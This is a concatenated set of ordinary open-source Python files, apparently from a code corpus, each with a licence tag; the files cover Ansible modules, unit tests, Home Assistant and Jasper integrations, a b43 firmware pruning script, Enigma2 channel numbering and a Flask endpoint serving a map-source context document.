or volume_qos['burst_iops'] != self.qos['burstIOPS']:
update_volume = True
changed = True
else:
# If check fails, do nothing
pass
if volume_detail.total_size is not None and volume_detail.total_size != self.size:
size_difference = abs(float(volume_detail.total_size - self.size))
# Change size only if difference is bigger than 0.001
if size_difference / self.size > 0.001:
update_volume = True
changed = True
else:
# If check fails, do nothing
pass
if volume_detail.attributes is not None and self.attributes is not None and \
volume_detail.attributes != self.attributes:
update_volume = True
changed = True
else:
if self.state == 'present':
changed = True
result_message = ""
if changed:
if self.module.check_mode:
result_message = "Check mode, skipping changes"
else:
if self.state == 'present':
if not volume_exists:
self.create_volume()
result_message = "Volume created"
elif update_volume:
self.update_volume(volume_id)
result_message = "Volume updated"
elif self.state == 'absent':
self.delete_volume(volume_id)
result_message = "Volume deleted"
self.module.exit_json(changed=changed, msg=result_message)
def main():
# Create object and call apply
na_elementsw_volume = ElementOSVolume()
na_elementsw_volume.apply()
if __name__ == '__main__':
main()
| gpl-3.0 |
x3ro/RIOT | tests/eepreg/tests/01-run.py | 30 | 1057 | #!/usr/bin/env python3
# Copyright (C) 2018 Acutam Automation, LLC
#
# This file is subject to the terms and conditions of the GNU Lesser
# General Public License v2.1. See the file LICENSE in the top level
# directory for more details.
import sys
from testrunner import run
def testfunc(child):
child.expect_exact("EEPROM registry (eepreg) test routine")
child.expect_exact("Testing new registry creation: reset check [SUCCESS]")
child.expect_exact("Testing writing and reading entries: add write add read [SUCCESS]")
child.expect_exact("Testing detection of conflicting size: add [SUCCESS]")
child.expect_exact("Testing calculation of lengths: len len [SUCCESS]")
child.expect_exact("Testing of successful data move after rm: rm read data [SUCCESS]")
child.expect_exact("Testing of free space change after write: free add free [SUCCESS]")
child.expect_exact("Testing of iteration over registry: iter bar foo [SUCCESS]")
child.expect_exact("Tests complete!")
if __name__ == "__main__":
sys.exit(run(testfunc))
| lgpl-2.1 |
littlstar/chromium.src | third_party/closure_linter/closure_linter/common/filetestcase.py | 109 | 3893 | #!/usr/bin/env python
# Copyright 2007 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test case that runs a checker on a file, matching errors against annotations.
Runs the given checker on the given file, accumulating all errors. The list
of errors is then matched against those annotated in the file. Based heavily
on devtools/javascript/gpylint/full_test.py.
"""
__author__ = ('[email protected] (Robert Walker)',
'[email protected] (Andy Perelson)')
import re
import unittest as googletest
from closure_linter.common import erroraccumulator
class AnnotatedFileTestCase(googletest.TestCase):
"""Test case to run a linter against a single file."""
# Matches an all caps letters + underscores error identifer
_MESSAGE = {'msg': '[A-Z][A-Z_]+'}
# Matches a //, followed by an optional line number with a +/-, followed by a
# list of message IDs. Used to extract expected messages from testdata files.
# TODO(robbyw): Generalize to use different commenting patterns.
_EXPECTED_RE = re.compile(r'\s*//\s*(?:(?P<line>[+-]?[0-9]+):)?'
r'\s*(?P<msgs>%(msg)s(?:,\s*%(msg)s)*)' % _MESSAGE)
def __init__(self, filename, lint_callable, converter):
"""Create a single file lint test case.
Args:
filename: Filename to test.
lint_callable: Callable that lints a file. This is usually runner.Run().
converter: Function taking an error string and returning an error code.
"""
googletest.TestCase.__init__(self, 'runTest')
self._filename = filename
self._messages = []
self._lint_callable = lint_callable
self._converter = converter
def shortDescription(self):
"""Provides a description for the test."""
return 'Run linter on %s' % self._filename
def runTest(self):
"""Runs the test."""
try:
filename = self._filename
stream = open(filename)
except IOError as ex:
raise IOError('Could not find testdata resource for %s: %s' %
(self._filename, ex))
expected = self._GetExpectedMessages(stream)
got = self._ProcessFileAndGetMessages(filename)
self.assertEqual(expected, got)
def _GetExpectedMessages(self, stream):
"""Parse a file and get a sorted list of expected messages."""
messages = []
for i, line in enumerate(stream):
match = self._EXPECTED_RE.search(line)
if match:
line = match.group('line')
msg_ids = match.group('msgs')
if line is None:
line = i + 1
elif line.startswith('+') or line.startswith('-'):
line = i + 1 + int(line)
else:
line = int(line)
for msg_id in msg_ids.split(','):
# Ignore a spurious message from the license preamble.
if msg_id != 'WITHOUT':
messages.append((line, self._converter(msg_id.strip())))
stream.seek(0)
messages.sort()
return messages
def _ProcessFileAndGetMessages(self, filename):
"""Trap gjslint's output parse it to get messages added."""
error_accumulator = erroraccumulator.ErrorAccumulator()
self._lint_callable(filename, error_accumulator)
errors = error_accumulator.GetErrors()
# Convert to expected tuple format.
error_msgs = [(error.token.line_number, error.code) for error in errors]
error_msgs.sort()
return error_msgs
| bsd-3-clause |
morphis/home-assistant | homeassistant/components/notify/free_mobile.py | 12 | 1750 | """
Support for thr Free Mobile SMS platform.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/notify.free_mobile/
"""
import logging
import voluptuous as vol
from homeassistant.components.notify import (
PLATFORM_SCHEMA, BaseNotificationService)
from homeassistant.const import CONF_ACCESS_TOKEN, CONF_USERNAME
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
REQUIREMENTS = ['freesms==0.1.1']
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_ACCESS_TOKEN): cv.string,
})
def get_service(hass, config, discovery_info=None):
"""Get the Free Mobile SMS notification service."""
return FreeSMSNotificationService(config[CONF_USERNAME],
config[CONF_ACCESS_TOKEN])
class FreeSMSNotificationService(BaseNotificationService):
"""Implement a notification service for the Free Mobile SMS service."""
def __init__(self, username, access_token):
"""Initialize the service."""
from freesms import FreeClient
self.free_client = FreeClient(username, access_token)
def send_message(self, message="", **kwargs):
"""Send a message to the Free Mobile user cell."""
resp = self.free_client.send_sms(message)
if resp.status_code == 400:
_LOGGER.error("At least one parameter is missing")
elif resp.status_code == 402:
_LOGGER.error("Too much SMS send in a few time")
elif resp.status_code == 403:
_LOGGER.error("Wrong Username/Password")
elif resp.status_code == 500:
_LOGGER.error("Server error, try later")
| apache-2.0 |
rwth-ti/gr-ofdm | python/ofdm/qa_channel_equalizer_mimo.py | 1 | 1301 | #!/usr/bin/env python
#
# Copyright 2014 Institute for Theoretical Information Technology,
# RWTH Aachen University
# www.ti.rwth-aachen.de
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest
import ofdm_swig as ofdm
class qa_channel_equalizer_mimo (gr_unittest.TestCase):
def setUp (self):
self.tb = gr.top_block ()
def tearDown (self):
self.tb = None
def test_001_t (self):
# set up fg
self.tb.run ()
# check data
if __name__ == '__main__':
gr_unittest.run(qa_channel_equalizer_mimo, "qa_channel_equalizer_mimo.xml")
| gpl-3.0 |
sunu/jasper-client | client/modules/Notifications.py | 35 | 1743 | # -*- coding: utf-8-*-
import re
import facebook
WORDS = ["FACEBOOK", "NOTIFICATION"]
def handle(text, mic, profile):
"""
Responds to user-input, typically speech text, with a summary of
the user's Facebook notifications, including a count and details
related to each individual notification.
Arguments:
text -- user-input, typically transcribed speech
mic -- used to interact with the user (for both input and output)
profile -- contains information related to the user (e.g., phone
number)
"""
oauth_access_token = profile['keys']['FB_TOKEN']
graph = facebook.GraphAPI(oauth_access_token)
try:
results = graph.request("me/notifications")
except facebook.GraphAPIError:
mic.say("I have not been authorized to query your Facebook. If you " +
"would like to check your notifications in the future, " +
"please visit the Jasper dashboard.")
return
except:
mic.say(
"I apologize, there's a problem with that service at the moment.")
if not len(results['data']):
mic.say("You have no Facebook notifications. ")
return
updates = []
for notification in results['data']:
updates.append(notification['title'])
count = len(results['data'])
mic.say("You have " + str(count) +
" Facebook notifications. " + " ".join(updates) + ". ")
return
def isValid(text):
"""
Returns True if the input is related to Facebook notifications.
Arguments:
text -- user-input, typically transcribed speech
"""
return bool(re.search(r'\bnotification|Facebook\b', text, re.IGNORECASE))
| mit |
Weihonghao/ECM | Vpy34/lib/python3.5/site-packages/theano/tensor/tests/test_opt_uncanonicalize.py | 1 | 6708 | from __future__ import absolute_import, print_function, division
import unittest
import numpy
import theano
from theano import function, config
from theano import scalar
from theano.gof import FunctionGraph
from theano.gof.opt import out2in
from theano.tensor.opt_uncanonicalize import (
local_alloc_dimshuffle,
local_reshape_dimshuffle,
local_dimshuffle_alloc,
local_dimshuffle_subtensor,
)
import theano.tensor as tensor
#from theano.tensor import matrix,max_and_argmax,MaaxAndArgmax,neg
from theano.tensor.elemwise import CAReduce, Elemwise, DimShuffle
from theano.tests import unittest_tools as utt
class T_max_and_argmax(unittest.TestCase):
def test_optimization(self):
# If we use only the max output, we should replace this op with
# a faster one.
mode = theano.compile.mode.get_default_mode().including(
'canonicalize', 'fast_run')
for axis in [0, 1, -1]:
data = numpy.asarray(numpy.random.rand(2, 3), dtype=config.floatX)
n = tensor.matrix()
f = function([n], tensor.max_and_argmax(n, axis)[0], mode=mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, CAReduce)
f = function([n], tensor.max_and_argmax(n, axis), mode=mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, tensor.MaxAndArgmax)
class T_min_max(unittest.TestCase):
def setUp(self):
utt.seed_rng()
self.mode = theano.compile.mode.get_default_mode().including(
'canonicalize', 'fast_run')
def test_optimization_max(self):
data = numpy.asarray(numpy.random.rand(2, 3), dtype=config.floatX)
n = tensor.matrix()
for axis in [0, 1, -1]:
f = function([n], tensor.max(n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, CAReduce)
f(data)
f = function([n], tensor.max(-n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 2
assert isinstance(topo[0].op, Elemwise)
assert isinstance(topo[0].op.scalar_op, scalar.Neg)
assert isinstance(topo[1].op, CAReduce)
f(data)
f = function([n], -tensor.max(n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 2
assert isinstance(topo[0].op, CAReduce)
assert isinstance(topo[1].op, Elemwise)
assert isinstance(topo[1].op.scalar_op, scalar.Neg)
f(data)
f = function([n], -tensor.max(-n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, CAReduce) # min
f(data)
def test_optimization_min(self):
data = numpy.asarray(numpy.random.rand(2, 3), dtype=config.floatX)
n = tensor.matrix()
for axis in [0, 1, -1]:
f = function([n], tensor.min(n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, CAReduce)
f(data)
# test variant with neg to make sure we optimize correctly
f = function([n], tensor.min(-n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 2
assert isinstance(topo[0].op, CAReduce) # max
assert isinstance(topo[1].op, Elemwise)
assert isinstance(topo[1].op.scalar_op, scalar.Neg)
f(data)
f = function([n], -tensor.min(n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 2
assert isinstance(topo[0].op, Elemwise)
assert isinstance(topo[0].op.scalar_op, scalar.Neg)
assert isinstance(topo[1].op, CAReduce) # max
f(data)
f = function([n], -tensor.min(-n, axis), mode=self.mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, CAReduce) # max
f(data)
def test_local_alloc_dimshuffle():
alloc_dimshuffle = out2in(local_alloc_dimshuffle)
x = tensor.vector('x')
m = tensor.iscalar('m')
y = x.dimshuffle('x', 0)
out = tensor.alloc(y, m, 1, x.shape[0])
g = FunctionGraph([x, m], [out])
alloc_dimshuffle(g)
topo = g.toposort()
assert any([not isinstance(x, DimShuffle) for x in topo])
def test_local_reshape_dimshuffle():
reshape_dimshuffle = out2in(local_reshape_dimshuffle)
x = tensor.matrix('x')
y = x.dimshuffle('x', 0, 'x', 1)
out = tensor.reshape(y, (1, x.shape[0] * x.shape[1], 1))
g = FunctionGraph([x], [out])
reshape_dimshuffle(g)
topo = g.toposort()
assert any([not isinstance(x, DimShuffle) for x in topo])
def test_local_dimshuffle_alloc():
reshape_dimshuffle = out2in(local_dimshuffle_alloc)
x = tensor.vector('x')
out = tensor.alloc(x, 3, 2).dimshuffle('x', 'x', 0, 1)
g = FunctionGraph([x], [out])
reshape_dimshuffle(g)
l = theano.gof.PerformLinker()
l.accept(g)
f = l.make_function()
assert f([3, 4]).ndim == 4
topo = g.toposort()
assert any([not isinstance(x, DimShuffle) for x in topo])
def test_local_dimshuffle_subtensor():
dimshuffle_subtensor = out2in(local_dimshuffle_subtensor)
x = tensor.dtensor4('x')
x = tensor.patternbroadcast(x, (False, True, False, False))
i = tensor.iscalar('i')
out = x[:, :, 10:30, ::i].dimshuffle(0, 2, 3)
g = FunctionGraph([x, i], [out])
dimshuffle_subtensor(g)
topo = g.toposort()
assert any([not isinstance(x, DimShuffle) for x in topo])
# Test dimshuffle remove dimensions the subtensor don't "see".
x = tensor.tensor(broadcastable=(False, True, False), dtype='float64')
out = x[i].dimshuffle(1)
g = FunctionGraph([x, i], [out])
dimshuffle_subtensor(g)
topo = g.toposort()
assert any([not isinstance(x, DimShuffle) for x in topo])
# Test dimshuffle remove dimensions the subtensor don't "see" but
# have in between dimensions.
x = tensor.tensor(broadcastable=(False, True, False, True),
dtype='float64')
out = x[i].dimshuffle(1)
f = theano.function([x, i], out)
topo = f.maker.fgraph.toposort()
assert any([not isinstance(x, DimShuffle) for x in topo])
assert f(numpy.random.rand(5, 1, 4, 1), 2).shape == (4,)
| agpl-3.0 |
Kast0rTr0y/ansible | lib/ansible/modules/messaging/rabbitmq_policy.py | 25 | 5071 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, John Dewey <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: rabbitmq_policy
short_description: Manage the state of policies in RabbitMQ.
description:
- Manage the state of a virtual host in RabbitMQ.
version_added: "1.5"
author: "John Dewey (@retr0h)"
options:
name:
description:
- The name of the policy to manage.
required: true
default: null
vhost:
description:
- The name of the vhost to apply to.
required: false
default: /
apply_to:
description:
- What the policy applies to. Requires RabbitMQ 3.2.0 or later.
required: false
default: all
choices: [all, exchanges, queues]
version_added: "2.1"
pattern:
description:
- A regex of queues to apply the policy to.
required: true
default: null
tags:
description:
- A dict or string describing the policy.
required: true
default: null
priority:
description:
- The priority of the policy.
required: false
default: 0
node:
description:
- Erlang node name of the rabbit we wish to configure.
required: false
default: rabbit
state:
description:
- The state of the policy.
default: present
choices: [present, absent]
'''
EXAMPLES = '''
- name: ensure the default vhost contains the HA policy via a dict
rabbitmq_policy:
name: HA
pattern: .*
args:
tags:
ha-mode: all
- name: ensure the default vhost contains the HA policy
rabbitmq_policy:
name: HA
pattern: .*
tags:
ha-mode: all
'''
class RabbitMqPolicy(object):
def __init__(self, module, name):
self._module = module
self._name = name
self._vhost = module.params['vhost']
self._pattern = module.params['pattern']
self._apply_to = module.params['apply_to']
self._tags = module.params['tags']
self._priority = module.params['priority']
self._node = module.params['node']
self._rabbitmqctl = module.get_bin_path('rabbitmqctl', True)
def _exec(self, args, run_in_check_mode=False):
if not self._module.check_mode or (self._module.check_mode and run_in_check_mode):
cmd = [self._rabbitmqctl, '-q', '-n', self._node]
args.insert(1, '-p')
args.insert(2, self._vhost)
rc, out, err = self._module.run_command(cmd + args, check_rc=True)
return out.splitlines()
return list()
def list(self):
policies = self._exec(['list_policies'], True)
for policy in policies:
policy_name = policy.split('\t')[1]
if policy_name == self._name:
return True
return False
def set(self):
import json
args = ['set_policy']
args.append(self._name)
args.append(self._pattern)
args.append(json.dumps(self._tags))
args.append('--priority')
args.append(self._priority)
if (self._apply_to != 'all'):
args.append('--apply-to')
args.append(self._apply_to)
return self._exec(args)
def clear(self):
return self._exec(['clear_policy', self._name])
def main():
arg_spec = dict(
name=dict(required=True),
vhost=dict(default='/'),
pattern=dict(required=True),
apply_to=dict(default='all', choices=['all', 'exchanges', 'queues']),
tags=dict(type='dict', required=True),
priority=dict(default='0'),
node=dict(default='rabbit'),
state=dict(default='present', choices=['present', 'absent']),
)
module = AnsibleModule(
argument_spec=arg_spec,
supports_check_mode=True
)
name = module.params['name']
state = module.params['state']
rabbitmq_policy = RabbitMqPolicy(module, name)
changed = False
if rabbitmq_policy.list():
if state == 'absent':
rabbitmq_policy.clear()
changed = True
else:
changed = False
elif state == 'present':
rabbitmq_policy.set()
changed = True
module.exit_json(changed=changed, name=name, state=state)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
| gpl-3.0 |
greedymouse/openwrt | tools/b43-tools/files/b43-fwsquash.py | 494 | 4767 | #!/usr/bin/env python
#
# b43 firmware file squasher
# Removes unnecessary firmware files
#
# Copyright (c) 2009 Michael Buesch <[email protected]>
#
# Licensed under the GNU/GPL version 2 or (at your option) any later version.
#
import sys
import os
def usage():
print("Usage: %s PHYTYPES COREREVS /path/to/extracted/firmware" % sys.argv[0])
print("")
print("PHYTYPES is a comma separated list of:")
print("A => A-PHY")
print("AG => Dual A-PHY G-PHY")
print("G => G-PHY")
print("LP => LP-PHY")
print("N => N-PHY")
print("HT => HT-PHY")
print("LCN => LCN-PHY")
print("LCN40 => LCN40-PHY")
print("AC => AC-PHY")
print("")
print("COREREVS is a comma separated list of core revision numbers.")
if len(sys.argv) != 4:
usage()
sys.exit(1)
phytypes = sys.argv[1]
corerevs = sys.argv[2]
fwpath = sys.argv[3]
phytypes = phytypes.split(',')
try:
corerevs = map(lambda r: int(r), corerevs.split(','))
except ValueError:
print("ERROR: \"%s\" is not a valid COREREVS string\n" % corerevs)
usage()
sys.exit(1)
fwfiles = os.listdir(fwpath)
fwfiles = filter(lambda str: str.endswith(".fw"), fwfiles)
if not fwfiles:
print("ERROR: No firmware files found in %s" % fwpath)
sys.exit(1)
required_fwfiles = []
def revs_match(revs_a, revs_b):
for rev in revs_a:
if rev in revs_b:
return True
return False
def phytypes_match(types_a, types_b):
for type in types_a:
type = type.strip().upper()
if type in types_b:
return True
return False
revmapping = {
"ucode2.fw" : ( (2,3,), ("G",), ),
"ucode4.fw" : ( (4,), ("G",), ),
"ucode5.fw" : ( (5,6,7,8,9,10,), ("G","A","AG",), ),
"ucode11.fw" : ( (11,12,), ("N",), ),
"ucode13.fw" : ( (13,), ("LP","G",), ),
"ucode14.fw" : ( (14,), ("LP",), ),
"ucode15.fw" : ( (15,), ("LP",), ),
"ucode16_mimo.fw" : ( (16,17,18,19,23,), ("N",), ),
# "ucode16_lp.fw" : ( (16,17,18,19,), ("LP",), ),
"ucode24_lcn.fw" : ( (24,), ("LCN",), ),
"ucode25_mimo.fw" : ( (25,28,), ("N",), ),
"ucode25_lcn.fw" : ( (25,28,), ("LCN",), ),
"ucode26_mimo.fw" : ( (26,), ("HT",), ),
"ucode29_mimo.fw" : ( (29,), ("HT",), ),
"ucode30_mimo.fw" : ( (30,), ("N",), ),
"ucode33_lcn40.fw" : ( (33,), ("LCN40",), ),
"ucode40.fw" : ( (40,), ("AC",), ),
"ucode42.fw" : ( (42,), ("AC",), ),
"pcm4.fw" : ( (1,2,3,4,), ("G",), ),
"pcm5.fw" : ( (5,6,7,8,9,10,), ("G","A","AG",), ),
}
initvalmapping = {
"a0g1initvals5.fw" : ( (5,6,7,8,9,10,), ("AG",), ),
"a0g0initvals5.fw" : ( (5,6,7,8,9,10,), ("A", "AG",), ),
"b0g0initvals2.fw" : ( (2,4,), ("G",), ),
"b0g0initvals5.fw" : ( (5,6,7,8,9,10,), ("G",), ),
"b0g0initvals13.fw" : ( (13,), ("G",), ),
"n0initvals11.fw" : ( (11,12,), ("N",), ),
"n0initvals16.fw" : ( (16,17,18,23,), ("N",), ),
"n0initvals24.fw" : ( (24,), ("N",), ),
"n0initvals25.fw" : ( (25,28,), ("N",), ),
"n16initvals30.fw" : ( (30,), ("N",), ),
"lp0initvals13.fw" : ( (13,), ("LP",), ),
"lp0initvals14.fw" : ( (14,), ("LP",), ),
"lp0initvals15.fw" : ( (15,), ("LP",), ),
# "lp0initvals16.fw" : ( (16,17,18,), ("LP",), ),
"lcn0initvals24.fw" : ( (24,), ("LCN",), ),
"ht0initvals26.fw" : ( (26,), ("HT",), ),
"ht0initvals29.fw" : ( (29,), ("HT",), ),
"lcn400initvals33.fw" : ( (33,), ("LCN40",), ),
"ac0initvals40.fw" : ( (40,), ("AC",), ),
"ac1initvals42.fw" : ( (42,), ("AC",), ),
"a0g1bsinitvals5.fw" : ( (5,6,7,8,9,10,), ("AG",), ),
"a0g0bsinitvals5.fw" : ( (5,6,7,8,9,10,), ("A", "AG"), ),
"b0g0bsinitvals5.fw" : ( (5,6,7,8,9,10,), ("G",), ),
"n0bsinitvals11.fw" : ( (11,12,), ("N",), ),
"n0bsinitvals16.fw" : ( (16,17,18,23,), ("N",), ),
"n0bsinitvals24.fw" : ( (24,), ("N",), ),
"n0bsinitvals25.fw" : ( (25,28,), ("N",), ),
"n16bsinitvals30.fw" : ( (30,), ("N",), ),
"lp0bsinitvals13.fw" : ( (13,), ("LP",), ),
"lp0bsinitvals14.fw" : ( (14,), ("LP",), ),
"lp0bsinitvals15.fw" : ( (15,), ("LP",), ),
# "lp0bsinitvals16.fw" : ( (16,17,18,), ("LP",), ),
"lcn0bsinitvals24.fw" : ( (24,), ("LCN",), ),
"ht0bsinitvals26.fw" : ( (26,), ("HT",), ),
"ht0bsinitvals29.fw" : ( (29,), ("HT",), ),
"lcn400bsinitvals33.fw" : ( (33,), ("LCN40",), ),
"ac0bsinitvals40.fw" : ( (40,), ("AC",), ),
"ac1bsinitvals42.fw" : ( (42,), ("AC",), ),
}
for f in fwfiles:
if f in revmapping:
if revs_match(corerevs, revmapping[f][0]) and\
phytypes_match(phytypes, revmapping[f][1]):
required_fwfiles += [f]
continue
if f in initvalmapping:
if revs_match(corerevs, initvalmapping[f][0]) and\
phytypes_match(phytypes, initvalmapping[f][1]):
required_fwfiles += [f]
continue
print("WARNING: Firmware file %s not found in the mapping lists" % f)
for f in fwfiles:
if f not in required_fwfiles:
print("Deleting %s" % f)
os.unlink(fwpath + '/' + f)
| gpl-2.0 |
philotas/enigma2 | lib/python/Components/Converter/ChannelNumbers.py | 42 | 1835 | from Components.NimManager import nimmanager
class ChannelNumbers:
def __init__(self):
pass
def getChannelNumber(self, frequency, nim):
f = int(self.getMHz(frequency))
descr = self.getTunerDescription(nim)
if "Europe" in descr:
if "DVB-T" in descr:
if 174 < f < 230: # III
d = (f + 1) % 7
return str(int(f - 174)/7 + 5) + (d < 3 and "-" or d > 4 and "+" or "")
elif 470 <= f < 863: # IV,V
d = (f + 2) % 8
return str(int(f - 470) / 8 + 21) + (d < 3.5 and "-" or d > 4.5 and "+" or "")
elif "Australia" in descr:
d = (f + 1) % 7
ds = (d < 3 and "-" or d > 4 and "+" or "")
if 174 < f < 202: # CH6-CH9
return str(int(f - 174)/7 + 6) + ds
elif 202 <= f < 209: # CH9A
return "9A" + ds
elif 209 <= f < 230: # CH10-CH12
return str(int(f - 209)/7 + 10) + ds
elif 526 < f < 820: # CH28-CH69
d = (f - 1) % 7
return str(int(f - 526)/7 + 28) + (d < 3 and "-" or d > 4 and "+" or "")
return ""
def getMHz(self, frequency):
if str(frequency).endswith('MHz'):
return frequency.split()[0]
return (frequency+50000)/100000/10.
def getTunerDescription(self, nim):
description = ""
try:
description = nimmanager.getTerrestrialDescription(nim)
except:
print "[ChannelNumber] nimmanager.getTerrestrialDescription(nim) failed, nim:", nim
return description
def supportedChannels(self, nim):
descr = self.getTunerDescription(nim)
if "Europe" in descr and "DVB-T" in descr:
return True
return False
def channel2frequency(self, channel, nim):
descr = self.getTunerDescription(nim)
if "Europe" in descr and "DVB-T" in descr:
if 5 <= channel <= 12:
return (177500 + 7000*(channel- 5))*1000
elif 21 <= channel <= 69:
return (474000 + 8000*(channel-21))*1000
return 474000000
channelnumbers = ChannelNumbers()
| gpl-2.0 |
omniscale/gbi-server | app/gbi_server/views/context.py | 1 | 8042 | # This file is part of the GBI project.
# Copyright (C) 2013 Omniscale GmbH & Co. KG <http://omniscale.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from functools import wraps
from flask import Blueprint, request, Response, g, url_for, current_app
from flask.ext.babel import gettext as _
from sqlalchemy.sql.expression import desc
from geoalchemy2.functions import ST_AsGeoJSON, ST_Transform
from gbi_server.config import SystemConfig
from gbi_server.model import WMTS, WMS, WFS, User
from gbi_server.extensions import db
from gbi_server.lib.couchdb import CouchDBBox, init_user_boxes
context = Blueprint("context", __name__, template_folder="../templates")
def check_auth(username, password):
user = User.by_email(username)
if user and user.check_password(password) and user.active:
g.user = user
return True
else:
return False
def authenticate():
"""Sends a 401 response that enables basic auth"""
return Response(
'Could not verify your access level for that URL.\n'
'You have to login with proper credentials', 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'})
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
auth = request.authorization
if not auth or not check_auth(auth.username, auth.password):
return Response("""
Could not verify your access level for that URL.
You have to login with proper credentials""", 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'})
return f(*args, **kwargs)
return decorated
@context.route('/context')
@requires_auth
def get_context_document():
init_user_boxes(g.user, current_app.config.get('COUCH_DB_URL'))
wmts_sources = db.session.query(WMTS, ST_AsGeoJSON(ST_Transform(WMTS.view_coverage, 3857))).order_by(desc(WMTS.is_background_layer)).all()
wms_sources = db.session.query(WMS, ST_AsGeoJSON(ST_Transform(WMS.view_coverage, 3857))).order_by(desc(WMS.is_background_layer)).all()
wfs_sources = db.session.query(WFS).all()
response = {
"version": "0.2",
"portal": {
"prefix": current_app.config['PORTAL_PREFIX'],
"title": current_app.config['PORTAL_TITLE'],
},
"wmts_sources": [],
"wms_sources": [],
"wfs_sources": [],
"couchdb_sources": [],
}
couchdb = CouchDBBox(current_app.config['COUCH_DB_URL'], '%s_%s' % (SystemConfig.AREA_BOX_NAME, g.user.id))
for source in wmts_sources:
wmts, view_coverage = source
geom = json.loads(view_coverage)
response['wmts_sources'].append({
"name": wmts.name,
"title": wmts.title,
"url": wmts.client_url(external=True),
"format": wmts.format,
"overlay": wmts.is_overlay,
"username": wmts.username,
"password": wmts.password,
"is_public": wmts.is_public,
"is_protected": wmts.is_protected,
"is_background_layer": wmts.is_background_layer,
"max_tiles": wmts.max_tiles,
"view_restriction": {
"zoom_level_start": wmts.view_level_start,
"zoom_level_end": wmts.view_level_end,
"geometry": geom
},
"download_restriction": {
"zoom_level_start": wmts.view_level_start,
"zoom_level_end": wmts.view_level_end,
}
})
for source in wms_sources:
wms, view_coverage = source
geom = json.loads(view_coverage)
response['wms_sources'].append({
"name": wms.name,
"title": wms.title,
"url": wms.url,
"layer": wms.layer,
"format": wms.format,
"overlay": wms.is_overlay,
"username": wms.username,
"password": wms.password,
"is_public": wms.is_public,
"is_protected": wms.is_protected,
"srs": wms.srs,
"wms_version": wms.version,
"view_restriction": {
"zoom_level_start": wms.view_level_start,
"zoom_level_end": wms.view_level_end,
"geometry": geom
},
"download_restriction": {
"zoom_level_start": wms.view_level_start,
"zoom_level_end": wms.view_level_end,
}
})
for wfs in wfs_sources:
response['wfs_sources'].append({
'id': wfs.id,
'name': wfs.name,
'layer': wfs.layer,
'host': wfs.host,
'url': wfs.url,
'srs': wfs.srs,
'geometry_field': wfs.geometry,
'feature_ns': wfs.ns_uri,
'typename': wfs.ns_prefix,
'search_property': wfs.search_property,
'username': wfs.username,
'password': wfs.password,
'is_protected': wfs.is_protected,
})
if current_app.config['FEATURE_AREA_BOXES']:
response['couchdb_sources'].append({
"name": _('area box'),
"url": current_app.config['COUCH_DB_URL'],
"dbname": '%s_%s' % (SystemConfig.AREA_BOX_NAME, g.user.id),
"username": 'user_%d' % g.user.id,
"password": g.user.authproxy_token,
"writable": True,
"dbname_user": SystemConfig.AREA_BOX_NAME_LOCAL,
})
if current_app.config['FEATURE_DOC_BOXES']:
if g.user.is_consultant:
response['couchdb_sources'].append({
"name": _('file box'),
"url": current_app.config['COUCH_DB_URL'],
"dbname": '%s_%s' % (SystemConfig.FILE_BOX_NAME, g.user.id),
"username": 'user_%d' % g.user.id,
"password": g.user.authproxy_token,
"writable": True,
